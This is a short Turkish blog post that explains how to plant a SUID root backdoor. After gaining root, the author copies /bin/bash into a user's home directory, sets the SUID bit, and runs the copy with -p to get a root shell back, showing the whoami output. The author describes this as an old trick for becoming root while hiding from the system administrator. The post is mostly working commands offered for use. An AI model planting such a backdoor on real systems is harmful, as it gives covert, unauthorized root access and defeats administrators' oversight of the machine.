Suid Backdoor
Parametresini unutup her bahsi geçildiğinde hatırlamaya çalıştığım ve bulmak için, iki saat nasıldı bu diye deneyip durduğum parametreyi buraya yazayım. Hem lazım olduğunda bulmam kolay olsun. Hemde bilmeyen varsa öğrenmiş olur 🙂
Öncelikle root yetkilerine sahip olmuş olmanız gerekiyor. Nasıl root olacağınız bu yazının dışında kalan bir konu. Biz root olduktan sonrası ile ilgileniyoruz 🙂
İlk olarak aşağıdaki komutlarla bash kabuğunun bir kopyasını alalım. Ben kendi ev dizinime kopyalamayı tercih ettim. Daha sonra chmod ile suid olarak ayarlayalım.
mordor ~ # cp /bin/bash ~harun/backdoor mordor ~ # chmod +s ~harun/backdoor
Artık suid arkakapımız hazır. Bundan sonra yapmamız gereken -p parametresi ile ev dizinimize aldığımız suid bash kabuğumuzun kopyasını çalıştırmak olacak…
harun@mordor ~ $ whoami harun harun@mordor ~ $ ./backdoor -p harun@mordor ~ # whoami root
Gençliğimizde, kullanıcı hesabımızın olduğu sistemlerde, sistem yöneticinden saklanıp zaman zaman root olabilmek için kullandığımız eski bir yöntem 🙂
Saygılarımla…